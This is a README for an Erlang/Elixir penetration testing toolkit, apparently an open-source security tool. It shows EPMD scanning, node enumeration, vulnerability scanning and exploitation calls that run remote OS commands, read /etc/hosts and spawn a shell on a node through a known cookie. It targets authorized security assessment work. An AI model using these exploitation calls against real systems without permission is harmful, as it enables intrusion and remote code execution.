Jæger — Norwegian for "hunter." In Norse myth, the hunter stalks what others cannot see. In distributed systems, so must we.
Erlang/Elixir node discovery and penetration testing toolkit.
- Discovery: EPMD scanning and node enumeration
- Fingerprinting: System info and version detection
- Vulnerability Scanning: Security misconfiguration detection
- Exploitation: RCE and post-exploitation capabilities
rebar3 escriptize# Start a test node
erl -sname myapp -setcookie secret123
# Scan for it
./_build/default/bin/jeger -r 127.0.0.1-1
# Scan network range with custom timeout and concurrency
./_build/default/bin/jeger -r 192.168.1.1-254 -t 2000 -c 100Common targets: Phoenix/Elixir apps, RabbitMQ, CouchDB, ejabberd
% Start shell
rebar3 shell
% Discovery
{ok, Hosts} = jeger_discovery:discover({"192.168.1.", 1, 254}, #{timeout => 2000, verbose => true}).
% Enumeration
{ok, Info} = jeger_enum:enumerate_node("192.168.1.5", "myapp", secret).
% Vulnerability scanning
{ok, Findings} = jeger_scan:scan_node("192.168.1.5", "myapp", secret).
% Cluster scanning (multiple nodes)
{ok, Results} = jeger_cluster:scan_cluster("127.0.0.1", ["node1", "node2", "node3"], my_cookie).
% Exploitation
{ok, Result} = jeger_exploit:execute_command("192.168.1.5", "myapp", secret, "os:cmd(\"whoami\")").
{ok, Content} = jeger_exploit:read_file("192.168.1.5", "myapp", secret, "/etc/hosts").
{ok, Pid} = jeger_exploit:spawn_shell("192.168.1.5", "myapp", secret).Scan multiple nodes in a clustered application:
% Scan all nodes in a Phoenix/Elixir cluster
{ok, Results} = jeger_cluster:scan_cluster(
"127.0.0.1",
["node1", "node2", "node3"],
my_cookie,
#{verbose => true}
).
% View formatted results
io:format("~s", [jeger_cluster:format_cluster_scan(Results)]).
% Extract specific findings
#{results := NodeResults} = Results,
[#{vulnerabilities := #{findings := Findings}} | _] = NodeResults.rebar3 eunitFor authorized security assessments only. Unauthorized access is illegal.
Apache-2.0